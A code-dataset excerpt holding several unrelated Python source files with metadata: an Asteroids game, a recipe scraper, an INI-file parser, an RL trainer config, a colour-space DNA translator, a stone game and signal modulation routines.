self.__ship_angle\n\n def spawn_ship(self):\n \"\"\"\n this method will spawn the ship, and check if-\n the ship already was spawned to prevent spawning infinitely\n :return:\n \"\"\"\n 
self.check_win()\n if not self.__is_start:\n return\n print(\"Spawning ship\")\n random_x = randint(self.__screen_min_x, self.__screen_max_x)\n random_y = randint(self.__screen_min_y, self.__screen_max_y)\n self.__ship.set_x(random_x)\n self.__ship.set_y(random_y)\n self.__screen.draw_ship(self.__ship.return_x(), self.__ship.return_y(), DEFAULT_SHIP_HEADING)\n self.__is_start = False\n\n def speed_up(self):\n \"\"\"\n this method will speed up the ship speed if requested\n :return:\n \"\"\"\n\n print(\"Speeding up!\")\n radians_angle = radians(self.__ship_angle)\n newspeed_x = self.__ship.return_speed_x() + cos(radians_angle)\n newspeed_y = self.__ship.return_speed_y() + sin(radians_angle)\n self.__ship.set_speed_x(newspeed_x)\n self.__ship.set_speed_y(newspeed_y)\n\n def move_ship(self):\n \"\"\"\n this method will change a object location in X,Y axis\n it firsts appends for asteroids_amount times and making new spots,\n the first [new] spot is always the ship spot, and the other ones is the asteroids new spots\n :return: new spot of object in Y axis\n \"\"\"\n\n self.check_win()\n if self.__is_start: # check if its the start of the game, because if yes there will be division by 0\n return\n newspot_x = self.__screen_min_x + (\n self.__ship.return_x() + self.__ship.return_speed_x() - self.__screen_min_x) % self.__avg_x\n newspot_y = self.__screen_min_y + (\n self.__ship.return_y() + self.__ship.return_speed_y() - self.__screen_min_y) % self.__avg_y\n self.__screen.draw_ship(newspot_x, newspot_y, self.__ship_angle)\n self.__ship.set_x(newspot_x)\n self.__ship.set_y(newspot_y)\n\n # ----ASTEROIDS METHODS----\n\n @staticmethod\n def set_asteroid_speed_spot(obj, random_x, random_y, random_speed_x, random_speed_y):\n \"\"\"\n this method will initialize the asteroid starting spot and speed\n :param obj: asteroid object\n :param random_x: the randomized x spot\n :param random_y: the randomized y spot\n :param random_speed_x: the randomized speed on the X axis\n :param random_speed_y: the randomized speed on the Y axis\n :return:\n \"\"\"\n\n obj.set_x(random_x)\n obj.set_y(random_y)\n obj.set_speed_x(random_speed_x)\n obj.set_speed_y(random_speed_y)\n\n def spawn_asteroids(self):\n \"\"\"\n this method will spawn on the start of the game the asteroids\n :return:\n \"\"\"\n\n if not self.__is_start: # checking if its the start of the game\n return\n for asteroid in range(self.__asteroids_amount):\n random_x = randint(self.__screen_min_x, self.__screen_max_x)\n random_y = randint(self.__screen_min_y, self.__screen_max_y)\n random_speed_x = randint(1, 4)\n random_speed_y = randint(1, 4)\n asteroid_obj = Asteroid(random_x, random_y, random_speed_x, random_speed_y, ASTEROIDS_SIZE)\n self.set_asteroid_speed_spot(asteroid_obj, random_x, random_y, random_speed_x, random_speed_y)\n self.__asteroids_objects.append(asteroid_obj)\n self.__screen.register_asteroid(asteroid_obj, ASTEROIDS_SIZE)\n self.__screen.draw_asteroid(asteroid_obj, asteroid_obj.return_x(), asteroid_obj.return_y())\n print(\"Spawned asteroids\")\n\n @staticmethod\n def new_asteroid_speed(torpedospeed_x, torpedospeed_y, ast_obj):\n \"\"\"\n this method will generate the new speed of the splitted asteroids\n :param torpedospeed_x: the torpedo current speed on the X axis\n :param torpedospeed_y: the torpedo current speed on the Y axis\n :param ast_obj: the asteroid object\n :return: the new coordinates\n \"\"\"\n\n newasteroidspeed_x = (torpedospeed_x + ast_obj.return_speed_x()) / (ast_obj.return_speed_x() ** 2 +\n ast_obj.return_speed_y() 
** 2) ** 0.5\n newasteroidspeed_y = -(torpedospeed_y + ast_obj.return_speed_y()) / (ast_obj.return_speed_x() ** 2 +\n ast_obj.return_speed_y() ** 2) ** 0.5\n return newasteroidspeed_x, newasteroidspeed_y\n\n def split_asteroid(self, ast_obj, tor_obj):\n \"\"\"\n this method will split the asteroids to two smaller asteroids or make him disappear\n :param ast_obj: the asteroid object which got hit\n :param tor_obj:\n :return:\n \"\"\"\n\n self.check_win()\n ast_size = ast_obj.return_size()\n self.__screen.unregister_asteroid(ast_obj)\n self.__asteroids_objects.remove(ast_obj)\n if ast_size == 3 or ast_size == 2:\n size = 2 if ast_size == 3 else 1 # if the radius of an asteroid is 3, or 2\n asteroid_new_speed_x, asteroid_new_speed_y = \\\n self.new_asteroid_speed(tor_obj.return_speed_x(), tor_obj.return_speed_y(), ast_obj)\n for i in range(2):\n # splitting to two different directions\n if i == 1:\n asteroid = Asteroid(\n ast_obj.return_x(), ast_obj.return_y(), -asteroid_new_speed_x, -asteroid_new_speed_y, size)\n else:\n asteroid = Asteroid(\n ast_obj.return_x(), ast_obj.return_y(), asteroid_new_speed_x, asteroid_new_speed_y, size)\n self.__screen.register_asteroid(asteroid, size)\n self.__asteroids_objects.append(asteroid)\n\n def check_hit(self, obj):\n \"\"\"\n this method will check if an object (ship, torpedo) got hit,\n and if it does, it will remove the which asteroid got hit\n :param obj: asteroid object\n :return: true if the was an hit and false if wasn't\n \"\"\"\n\n self.check_win()\n hit_or_not = False\n if not obj.return_removed():\n if obj.has_intersection(self.__ship): # checking if the ship has hit an asteroid object\n print(\"[!] Ship hit\")\n self.__screen.show_message(HIT_ASTEROID_TITLE, HIT_ASTEROID)\n self.__screen.remove_life()\n self.__screen.unregister_asteroid(obj)\n self.__asteroids_objects.remove(obj) # we unregistered the asteroid,we also need to remove it from list\n self.__lives -= 1 # the ship was hit\n hit_or_not = True\n for torpedo in self.__torpedo_objects:\n if obj.has_intersection(torpedo): # checking if a torpedo hit an asteroid object\n print(\"[!] Torpedo hit\")\n if self.__is_torpedo_launched:\n self.split_asteroid(obj, torpedo)\n print(\"[!] 
New asteroids spawned\")\n self.__torpedo_objects.remove(torpedo)\n self.__screen.unregister_torpedo(torpedo)\n if len(self.__torpedo_objects) == 0:\n self.__is_torpedo_launched = False\n self.set_score(obj)\n hit_or_not = True\n return hit_or_not\n\n def move_asteroids(self):\n \"\"\"\n this method will move all asteroids objects, in the same angle\n :return:\n \"\"\"\n\n self.check_win()\n for asteroid_obj in self.__asteroids_objects:\n newspot_x = self.__screen_min_x + (\n asteroid_obj.return_x() + asteroid_obj.return_speed_x() - self.__screen_min_x) % self.__avg_x\n newspot_y = self.__screen_min_y + (\n asteroid_obj.return_y() + asteroid_obj.return_speed_y() - self.__screen_min_y) % self.__avg_y\n self.__screen.draw_asteroid(asteroid_obj, newspot_x, newspot_y)\n asteroid_obj.set_x(newspot_x)\n asteroid_obj.set_y(newspot_y)\n self.check_hit(asteroid_obj)\n\n # ----TORPEDO METHODS----\n\n def check_torpedo_time(self, tor_obi):\n \"\"\"\n this method will check the torpedo time\n :param tor_obi: torpedo object\n :return: if the the torpedo object was removed\n \"\"\"\n\n if tor_obi.return_life_time() >= 200:\n self.__torpedo_objects.remove(tor_obi)\n self.__screen.unregister_torpedo(tor_obi)\n return True\n return False\n\n def spawn_torpedo(self):\n \"\"\"\n this method will spawn a torpedo after space key has been pressed\n :return: true if a torpedo was spawned\n \"\"\"\n\n self.check_win()\n if len(self.__torpedo_objects) >= 10:\n print(\"[!] Couldn't spawn Torpedo, there is already 10 of them.\")\n return False\n self.__is_torpedo_launched = True\n torpedospeed_x = self.__ship.return_speed_x() + 2 * cos(radians(self.__ship_angle))\n torpedospeed_y = self.__ship.return_speed_y() + 2 * sin(radians(self.__ship_angle))\n torpedo = Torpedo(TORPEDO_RADIUS)\n torpedo.set_speed_x(torpedospeed_x)\n torpedo.set_speed_y(torpedospeed_y)\n torpedo.set_x(self.__ship.return_x())\n torpedo.set_y(self.__ship.return_y())\n torpedo.set_angle(self.__ship_angle)\n self.__screen.register_torpedo(torpedo)\n self.__torpedo_objects.append(torpedo)\n print(\"[!] 
Spawned Torpedo\")\n return True\n\n def move_torpedo(self):\n \"\"\"\n this method will move each torpedo and remove him if-\n his life time finished\n :return:\n \"\"\"\n\n self.check_win()\n if not self.__is_torpedo_launched:\n return\n for torpedo in self.__torpedo_objects:\n newspot_x = self.__screen_min_x + (\n torpedo.return_x() + torpedo.return_speed_x() - self.__screen_min_x) % self.__avg_x\n newspot_y = self.__screen_min_y + (\n torpedo.return_y() + torpedo.return_speed_y() - self.__screen_min_y) % self.__avg_y\n self.__screen.draw_torpedo(torpedo, newspot_x, newspot_y, self.__ship_angle)\n torpedo.set_x(newspot_x)\n torpedo.set_y(newspot_y)\n\n\ndef main(amount):\n runner = GameRunner(amount)\n runner.run()\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) > 1:\n main(int(sys.argv[1]))\n else:\n main(DEFAULT_ASTEROIDS_NUM)\n","sub_path":"solutions/ex10/asteroids_main.py","file_name":"asteroids_main.py","file_ext":"py","file_size_in_byte":15148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"521813307","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 11 21:04:24 2019\n\n@author: pierre\n\"\"\"\nfrom keep import *\nfrom function_marmiton import *\n# =============================================================================\n# Variables pour la requete\n# =============================================================================\nsearch_str_list=[\"croque madame\",\"pizza carbonara\",\"pate carbonara\",\"Gateaux Chocolat\",\"salade césar\",\"tomates moza\"]\nsearch_str_list=[search_str.replace(\" \", \"-\") for search_str in search_str_list]\nroot_url=\"https://www.marmiton.org/\"\nurl=root_url+'recettes/recherche.aspx'\n\na=[scrap_url(url,{\"aqt\":search_str}) for search_str in search_str_list]\nb=[data_scraping(root_url+url[0][0]) for url in a]\n\nn_per=[3,2,2,8,2,1]\nif len(n_per)==len(search_str_list):\n liste_finale=liste_ingredient(b,n_per)\n create_doc_list(liste_finale)\n create_doc_json(liste_finale)\nelse:\n liste_finale='Erreur de taille'\n\nexport(liste_finale)\n\n\n# =============================================================================\n# Explication Algo :\n# 0- Etablir les paramètres de la recherche\n# 1- Rechercher les differentes recette se rapportant à la recherche\n# 2- Conserver les urls des recettes les plus proche de la recherche\n# 3- Etablir la liste des ingrédients\n# ============================================================================","sub_path":"Source/marmiton_scrapping.py","file_name":"marmiton_scrapping.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"171048297","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win32\\egg\\eztest\\ini.py\n# Compiled at: 2018-06-21 22:15:50\n\"\"\"Load data from INI file.\nThe INI file format is an informal standard for configuration files for some platforms or software.\nINI files are simple text files with a basic structure composed of sections, properties, and values.\n\ne.g.:\n;comment text\n[people]\nname=value\n\nusage:\na = INI(\"/tmp/example.ini\") # Load INI data from file.\na.get(\"people\") # Get section \"people\".\na.get(\"people\", \"name\") # Get value of property \"name\" under section \"people\".\na.get(\"people\", \"hello\", \"world\") # Get value of 
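# --- Aside: the move_* methods above all rely on one wrap-around formula,
#     new = min + (pos + delta - min) % (max - min),
# which keeps ship, asteroids and torpedoes on a toroidal screen. A tiny
# standalone sketch with made-up screen bounds:
def wrap(pos, delta, lo, hi):
    # shift into [0, hi - lo), advance, take the modulo, shift back
    return lo + (pos + delta - lo) % (hi - lo)

assert wrap(90, 20, -100, 100) == -90   # off the right edge, re-enters left
assert wrap(-95, -10, -100, 100) == 95  # off the left edge, re-enters right
# --- end aside ---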
property \"hello\" under section \"people\", or default value \"world\" if section or property not found.\n\na.contains(\"people\") # Whether INI file contains section \"people\".\na.contains(\"people\", \"name\") # Whether INI file contains property \"name\" under section \"people\".\n\na.set(\"new section\") # Define section \"new section\".\na.set(\"new section\", \"new property name\", \"new value\") # Define property \"new property name\" and its value under section \"new section\".\n\na.remove(\"new section\", \"new property name\") # Remove property \"new property name\" from section \"new section\".\na.remove(\"new section\") # Remove section \"new section\".\n\na.save() # Save to INI file.\na.save(\"/tmp/new_file.ini\") # Save to /tmp/new_file.ini file.\n\nclass People:\n def __init__(self):\n self.name = None\n\np = People()\na.get(\"people\").to_object(p) # Set p with same properties under section \"people\" in INI file.\na.get(\"people\").contains(\"name\") # Whether section \"people\" contains property \"name\".\na.get(\"people\").get(\"name\") # Get value of property \"name\".\na.get(\"people\").get(\"hello\", \"world\") # Get value of property \"hello\", or default value if not found.\na.get(\"people\").set(\"new property name\", \"new value\") # Define property \"new property name\" and its value\na.get(\"people\").clear() # Clear all properties.\na.get(\"people\").from_object(p) # Set \"people\" section from p object.\n\nCommon escape sequences in INI file.\nSequence Meaning\n\\\\ \\\\ (a single backslash, escaping the escape character)\n\\x00 Null character\n Tab character\n\n Carriage return\n\n Line feed\n\\\\; Semicolon\n\"\"\"\nimport inspect, json, os, re, sys\nfrom .utility import to_boolean\nPROPERTY_TYPES = [\n bin, bool, bytearray, complex, dict, float, hex, int, list, oct, set, str, tuple]\nif sys.version_info <= (2, 7):\n PROPERTY_TYPES.append(basestring, long, unicode)\nif sys.version_info >= (3, 0):\n PROPERTY_TYPES.append(bytes)\n\nclass INI:\n \"\"\"Ini class is used for configuration file. The content in this file should be:\n\n ;comment text\n [section]\n name=value\n You also can view the standard of configuration from \"http://en.wikipedia.org/wiki/INI_file\"\n \"\"\"\n __slots__ = [\n 'file_path', 'sections']\n\n def __init__(self, file_path=None):\n \"\"\"Initialization. 
Load settings from configuration file.\n\n :param str file_path: configuration file's path.\n \"\"\"\n self.file_path = file_path\n self.sections = []\n if self.file_path:\n if not os.path.abspath(self.file_path):\n self.file_path = os.path.join(os.getcwd(), self.file_path)\n if os.path.exists(self.file_path):\n self._load()\n\n def _load(self):\n \"\"\"Load settings from configuration file.\"\"\"\n with open(self.file_path, 'r') as (f):\n try:\n s = None\n while True:\n line = f.readline()\n if not line:\n break\n line = line.strip()\n if line == '':\n continue\n if line.startswith('[') and line.endswith(']'):\n s = Section(line[1:-1])\n self.sections.append(s)\n elif line.startswith(';'):\n continue\n elif s is not None:\n i = line.find('=')\n if i > 0:\n k = line[0:i].strip()\n if not k:\n continue\n v = line[i + 1:].strip()\n if v == '\\\\0':\n v = None\n elif v.find('\\\\') >= 0:\n nv = ''\n token = None\n for c in v:\n if token:\n token += c\n if token == '\\\\\\\\':\n nv += '\\\\'\n elif token == '\\\\t':\n nv += '\\t'\n elif token == '\\\\r':\n nv += '\\r'\n elif token == '\\\\n':\n nv += '\\n'\n else:\n nv += token\n token = None\n elif c == '\\\\':\n token = c\n else:\n nv += c\n\n if token:\n nv += token\n v = nv\n s.set(k, v)\n\n except Exception as e:\n raise Exception(('Failed to load data: {}').format(str(e)))\n\n return\n\n def set(self, section_name, property_name=None, property_value=None):\n \"\"\"Add/update section or property value.\n\n :param str section_name: section name.\n :param str property_name: property name in section.\n :param property_value: property value in section.\n \"\"\"\n if not section_name:\n return ValueError('section_name cannot be null or empty')\n else:\n for s in self.sections:\n if s.name == section_name:\n s1 = s\n break\n else:\n s1 = Section(section_name)\n self.sections.append(s1)\n\n if property_name is not None:\n s1.set(property_name, property_value)\n return\n\n def contains(self, section_name, property_name=None):\n \"\"\"Whether ini file contains specified section or property name.\n\n :param str section_name: section name.\n :param str property_name: property name in section.\n :return bool: True if section_name or property_name found, otherwise False.\n \"\"\"\n if not section_name:\n return False\n else:\n for s in self.sections:\n if s.name == section_name:\n s1 = s\n break\n else:\n return False\n\n if property_name is None:\n return True\n return s1.contains(property_name)\n\n def get(self, section_name, property_name=None, default_value=None):\n \"\"\"Get section or property value according to section name and property name.\n\n :param str section_name : section name.\n :param str property_name : property name in section.\n :param default_value: default value for property.\n :return Section|str: Section if section_name found and no property_name provided, None if section_name not found;\n Property value if property_name provided and found, otherwise default_value.\n \"\"\"\n if not section_name:\n return ValueError('section_name cannot be null or empty')\n else:\n for s in self.sections:\n if s.name == section_name:\n s1 = s\n break\n else:\n return\n\n if property_name is None:\n return s1\n return s1.get(property_name, default_value)\n\n def save(self, file_path=None):\n \"\"\"Save settings into configuration file.\"\"\"\n file_path = file_path or self.file_path\n if not file_path:\n raise ValueError('Please provide file path.')\n with open(file_path, 'w') as (f):\n try:\n for s in self.sections:\n 
f.write(('[{}]{}').format(s.name, os.linesep))\n for key, value in s.properties.items():\n if isinstance(value, dict):\n value = json.dumps(value)\n elif isinstance(value, list):\n value = (',').join([ str(v) for v in value ])\n elif isinstance(value, set):\n value = (',').join(list(value))\n elif isinstance(value, bytearray) or sys.version_info >= (3,\n 0) and isinstance(value, bytes):\n value = value.decode('utf-8')\n elif value is not None:\n value = str(value)\n if value is None:\n value = '\\\\0'\n else:\n value = value.replace('\\\\', '\\\\\\\\').replace('\\r', '\\\\r').replace('\\n', '\\\\n').replace('\\t', '\\\\t')\n f.write(('{}={}{}').format(key, value, os.linesep))\n\n f.write(os.linesep)\n\n except Exception as e:\n raise Exception(('Failed to write data into file: {}').format(str(e)))\n\n return\n\n def remove(self, section_name, property_name=None):\n \"\"\"Remove section or property.\n\n :param section_name : section name.\n :param property_name : property name in section.\n \"\"\"\n if not section_name:\n return ValueError('section_name cannot be null or empty')\n else:\n for s in self.sections:\n if s.name == section_name:\n s1 = s\n break\n else:\n return\n\n if property_name is None:\n self.sections.remove(s1)\n return\n s1.remove(property_name)\n return\n\n\nclass Section:\n \"\"\"Section class, contains section name and its properties.\"\"\"\n __slots__ = [\n 'name', 'properties']\n\n def __init__(self, section_name=None):\n \"\"\"Initialization.\n\n :param str section_name: section name.\n \"\"\"\n self.name = section_name\n self.properties = dict()\n\n def set(self, property_name, property_value=None):\n \"\"\"Add/update property\n\n :param str property_name: property name.\n :param property_value: property value.\n \"\"\"\n if not property_name:\n raise ValueError('property_name can not be null or empty.')\n self.properties[property_name] = property_value\n\n def contains(self, property_name):\n \"\"\"Whether section contains specified property name.\n\n :param str property_name: property name.\n :return bool: True if Section contains the property, otherwise False.\n \"\"\"\n if not property_name:\n return False\n return property_name in self.properties\n\n def remove(self, property_name):\n \"\"\"Remove a property by property name.\n\n :param str property_name: property name.\n \"\"\"\n if not property_name:\n raise ValueError('property_name can not be null or empty.')\n if property_name in self.properties:\n del self.properties[property_name]\n\n def get(self, property_name, default_value=None):\n \"\"\"Get property value by property name.\n\n :param str property_name: property name.\n :param default_value: return default value if it does not exist.\n :return str: property value if found, otherwise returns default_value.\n \"\"\"\n if not property_name:\n raise ValueError('property_name can not be null or empty.')\n return self.properties.get(property_name, default_value)\n\n def clear(self):\n \"\"\"Clear all properties.\"\"\"\n self.properties = dict()\n\n def to_object(self, obj):\n \"\"\"Copy values of property in section to property in the object.\n\n :param obj: the object which should be evaluated.\n :return dict: a dictionary with keys don't exist in obj.\n \"\"\"\n if obj is None:\n raise ValueError('obj can not be None.')\n result = dict()\n for key, value in self.properties.items():\n if hasattr(obj, key):\n attr = getattr(obj, key)\n t = type(attr)\n if t is bin:\n v = bin(int(value, 2))\n elif t is bool:\n v = to_boolean(value)\n elif t is 
bytearray:\n v = bytearray(value, encoding='utf-8')\n elif t is complex:\n g = re.match('^(-?\\\\d+)(([\\\\+\\\\-]\\\\d+)[ij])?$', value)\n if g:\n v = complex(int(g.group(1)), int(g.group(3)))\n else:\n v = value\n elif t is dict:\n v = json.loads(value)\n elif t is float:\n v = float(value)\n elif t is hex:\n v = hex(int(value, 16))\n elif t is int:\n v = int(value)\n elif t is list:\n v = value.split(',')\n elif t is set:\n v = set(value.split(','))\n elif t is tuple:\n v = tuple(value.split(','))\n elif t is oct:\n v = oct(int(value, 8))\n elif t is str:\n v = str(value)\n elif sys.version_info <= (2, 7):\n if t is long:\n v = long(value)\n elif t is unicode:\n v = unicode(value, encoding='utf-8')\n else:\n v = value\n elif sys.version_info >= (3, 0) and t is bytes:\n v = bytes(value, encoding='utf-8')\n else:\n v = value\n setattr(obj, key, v)\n else:\n result[key] = value\n\n return obj\n\n def from_object(self, obj):\n \"\"\"Copy values from object.\n\n :param obj: object.\n :return Section: self.\n \"\"\"\n if obj is None:\n raise ValueError('obj can not be None.')\n for key, value in inspect.getmembers(obj):\n if type(value) in PROPERTY_TYPES:\n self.set(key, value)\n\n return self","sub_path":"pycfiles/eztest-2.0.1-py2.7/ini.py","file_name":"ini.py","file_ext":"py","file_size_in_byte":15332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"157177167","text":"\"\"\"Trainer and configuration for SVG(inf).\"\"\"\nfrom ray.rllib import SampleBatch\nfrom ray.rllib.optimizers import PolicyOptimizer\nfrom ray.rllib.utils import override\n\nfrom raylab.agents import Trainer\nfrom raylab.agents import with_common_config\nfrom raylab.utils.replay_buffer import NumpyReplayBuffer\nfrom raylab.utils.replay_buffer import ReplayField\n\nfrom .policy import SVGInfTorchPolicy\n\n\nDEFAULT_CONFIG = with_common_config(\n {\n # === Optimization ===\n # Weight of the fitted V loss in the joint model-value loss\n \"vf_loss_coeff\": 1.0,\n # Clip gradient norms by this value\n \"max_grad_norm\": 10.0,\n # Clip importance sampling weights by this value\n \"max_is_ratio\": 5.0,\n # Interpolation factor in polyak averaging for target networks.\n \"polyak\": 0.995,\n # PyTorch optimizers to use\n \"torch_optimizer\": {\n \"on_policy\": {\"type\": \"Adam\", \"lr\": 1e-3},\n \"off_policy\": {\"type\": \"Adam\", \"lr\": 1e-3},\n },\n # Model and Value function updates per step in the environment\n \"updates_per_step\": 1.0,\n # === Replay buffer ===\n # Size of the replay buffer.\n \"buffer_size\": 500000,\n # === Regularization ===\n # Options for adaptive KL coefficient. See raylab.utils.adaptive_kl\n \"kl_schedule\": {},\n # === Network ===\n # Size and activation of the fully connected networks computing the logits\n # for the policy, value function and model. No layers means the component is\n # linear in states and/or actions.\n \"module\": {\"type\": \"SVGModule\", \"torch_script\": True},\n # === Exploration Settings ===\n # Default exploration behavior, iff `explore`=None is passed into\n # compute_action(s).\n # Set to False for no exploration behavior (e.g., for evaluation).\n \"explore\": True,\n # Provide a dict specifying the Exploration object's config.\n \"exploration_config\": {\n # The Exploration class to use. In the simplest case, this is the name\n # (str) of any class present in the `rllib.utils.exploration` package.\n # You can also provide the python class directly or the full location\n # of your class (e.g. 
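# --- Aside: a round-trip sketch for the INI class above (the file path is
# a placeholder). Values containing tabs or newlines survive save()/reload
# because save() escapes them and _load() unescapes them:
ini = INI('/tmp/example.ini')
ini.set('people', 'name', 'line1\nline2\tend')
ini.save()
assert INI('/tmp/example.ini').get('people', 'name') == 'line1\nline2\tend'
# --- end aside ---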
\"ray.rllib.utils.exploration.epsilon_greedy.\n # EpsilonGreedy\").\n \"type\": \"raylab.utils.exploration.StochasticActor\",\n },\n # === Evaluation ===\n # Extra arguments to pass to evaluation workers.\n # Typical usage is to pass extra args to evaluation env creator\n # and to disable exploration by computing deterministic actions\n \"evaluation_config\": {\"explore\": True},\n # === Common config defaults ===\n \"num_workers\": 0,\n \"rollout_fragment_length\": 1,\n \"batch_mode\": \"complete_episodes\",\n \"train_batch_size\": 128,\n }\n)\n\n\nclass SVGInfTrainer(Trainer):\n \"\"\"Single agent trainer for SVG(inf).\"\"\"\n\n # pylint: disable=attribute-defined-outside-init\n\n _name = \"SVG(inf)\"\n _default_config = DEFAULT_CONFIG\n _policy = SVGInfTorchPolicy\n\n @override(Trainer)\n def _init(self, config, env_creator):\n self._validate_config(config)\n self.workers = self._make_workers(\n env_creator, self._policy, config, num_workers=config[\"num_workers\"]\n )\n # Dummy optimizer to log stats since Trainer.collect_metrics is coupled with it\n self.optimizer = PolicyOptimizer(self.workers)\n\n policy = self.get_policy()\n policy.set_reward_from_config(config[\"env\"], config[\"env_config\"])\n\n self.replay = NumpyReplayBuffer(\n policy.observation_space, policy.action_space, config[\"buffer_size\"]\n )\n self.replay.add_fields(ReplayField(SampleBatch.ACTION_LOGP))\n self.replay.seed(config[\"seed\"])\n\n @override(Trainer)\n def _train(self):\n worker = self.workers.local_worker()\n policy = worker.get_policy()\n\n samples = worker.sample()\n self.optimizer.num_steps_sampled += samples.count\n for row in samples.rows():\n self.replay.add(row)\n stats = policy.get_exploration_info()\n\n with policy.learning_off_policy():\n for _ in range(int(samples.count * self.config[\"updates_per_step\"])):\n batch = self.replay.sample(self.config[\"train_batch_size\"])\n off_policy_stats = policy.learn_on_batch(batch)\n self.optimizer.num_steps_trained += batch.count\n stats.update(off_policy_stats)\n\n stats.update(policy.learn_on_batch(samples))\n\n return self._log_metrics(stats)\n","sub_path":"raylab/agents/svg/inf/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":4653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"553513871","text":"class Translate(object):\n \"\"\"translate solid csfasta file to fasta file\"\"\"\n def __init__(self, csfasta, fasta, qual = None, cutoff = 12, min_len = 25):\n self.csfasta = csfasta\n self.fasta = fasta\n self.qual = qual\n self.cutoff = cutoff\n self.min_len = min_len\n self.color_space = {\n 'A': {\n '0': 'A',\n '1': 'C',\n '2': 'G',\n '3': 'T'\n },\n 'G': {\n '0': 'G',\n '1': 'T',\n '2': 'A',\n '3': 'C'\n },\n 'C': {\n '0': 'C',\n '1': 'A',\n '2': 'T',\n '3': 'G'\n },\n 'T': {\n '0': 'T',\n '1': 'G',\n '2': 'C',\n '3': 'A'\n }\n }\n\n def translate(self):\n \"\"\"\n if ft is True, filte low quality base when translate\n \"\"\"\n fin = open(self.csfasta, 'r')\n fo = open(self.fasta, 'w')\n if self.qual:\n fqual = open(self.qual, 'r')\n\n for line in fin:\n if self.qual:\n qline = fqual.readline()\n if line.startswith(\"#\"):\n continue\n elif line.startswith(\">\"):\n fo.write(line)\n else:\n line = line.strip()\n if self.qual:\n qline = qline.strip()\n fo.write(self._translate_read(line, qual = qline, cutoff = self.cutoff, min_len = self.min_len))\n else:\n fo.write(self._translate_read(line))\n fo.write(\"\\n\")\n fin.close()\n fo.close()\n\n def _translate_read(self, 
read, **filte):\n seq = [read[0]]\n for b in read[1:]:\n if b == \".\":\n break\n seq.append(self.color_space[seq[-1]][b])\n end = 1\n if filte:\n qual = filte.get(\"qual\", [])\n cutoff = filte.get(\"cutoff\", 12)\n min_len = filte.get(\"min_len\", 25)\n for q in qual:\n if q < cutoff:\n break\n end += 1\n seq = seq[:end]\n if len(seq) < min_len:\n seq = []\n return \"\".join(seq)\n","sub_path":"pysolidqa/translate.py","file_name":"translate.py","file_ext":"py","file_size_in_byte":2253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"572286087","text":"import random\n\n\ndef solution(s):\n score = 0\n while len(s) > 1:\n r1 = random.randint(0, len(s)-1)\n r2 = r1\n while r2 == r1:\n r2 = random.randint(0, len(s)-1)\n tmp1 = s[r1]\n tmp2 = s[r2]\n score += tmp1 * tmp2\n s.append(tmp1 + tmp2)\n s.remove(tmp1) # 删除找到第一个匹配项\n s.remove(tmp2)\n print(s)\n return score\n\n\nif __name__ == '__main__':\n\n stones = [1, 2, 3, 4, 5, 6, 7, 8, 8, 8, 8]\n\n print(solution(stones))\n","sub_path":"contest/stone_game.py","file_name":"stone_game.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"87609264","text":"import numpy\nimport math\nimport operator\n\n# Methods common to both the transmitter and receiver\ndef modulate(fc, samplerate, samples):\n '''\n A modulator that multiplies samples with a local carrier \n of frequency fc, sampled at samplerate\n '''\n\n s = len(samples)\n mod_samples = numpy.empty(s)\n for n in range(s):\n carrier_signal_sample = math.cos(2 * math.pi * fc / samplerate * n)\n # carrier_signal_sample = math.cos(fc / samplerate * n)\n mod_samples[n] = samples[n] * carrier_signal_sample\n # mod_samples[n] = 0\n\n return mod_samples\n\n\ndef demodulate(fc, samplerate, samples):\n '''\n A demodulator that performs quadrature demodulation\n '''\n\n s = len(samples)\n demod_samples = numpy.empty(s)\n for n in range(s):\n\n #change the inverse_sample to use exponential\n inverse_sample = math.cos(2 * math.pi * fc / samplerate * n)\n # inverse_sample = math.exp(1j * 2 * math.pi * fc / samplerate * n)\n demod_samples[n] = samples[n] * inverse_sample\n\n omega_cut = math.pi * fc / samplerate\n lpf_samples = lpfilter(demod_samples, omega_cut)\n\n return lpf_samples\n\n\ndef lpfilter(samples_in, omega_cut):\n '''\n A low-pass filter of frequency omega_cut.\n '''\n\n # set the filter unit sample response\n L = 50\n filter_length = L * 2 + 1\n unit_sample_response = numpy.empty(filter_length)\n for n in range(-L, L + 1):\n if n != 0:\n val = math.sin(omega_cut * n) / (math.pi * n)\n else:\n val = omega_cut / math.pi\n unit_sample_response[n] = val\n\n # compute the demodulated samples\n s = len(samples_in)\n lpf_samples = numpy.empty(s)\n for n in range(s):\n input_samples = numpy.empty(filter_length)\n i = 0\n for m in range(n-L, n+L+1):\n if m < 0 or m >= s:\n input_samples[i] = 0\n else:\n input_samples[i] = samples_in[m]\n i += 1\n lpf_samples[n] = numpy.dot(unit_sample_response, input_samples[::-1])\n\n return numpy.absolute(lpf_samples)\n\n","sub_path":"milestone3_starter_mod_demod/common_txrx_mil3.py","file_name":"common_txrx_mil3.py","file_ext":"py","file_size_in_byte":1922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"612719684","text":"from ripper.apolloRipper.model.song import Song\nimport logging\n\nfrom ripper.apolloRipper.tagging.spotify_meta_retriever import 
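# --- Aside: modulate() above multiplies sample n by cos(2*pi*fc/samplerate*n)
# in a Python loop; the same computation vectorised with numpy, offered only
# as an equivalent alternative formulation:
import math
import numpy

def modulate_vec(fc, samplerate, samples):
    n = numpy.arange(len(samples))
    return numpy.asarray(samples) * numpy.cos(2 * math.pi * fc / samplerate * n)
# --- end aside ---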
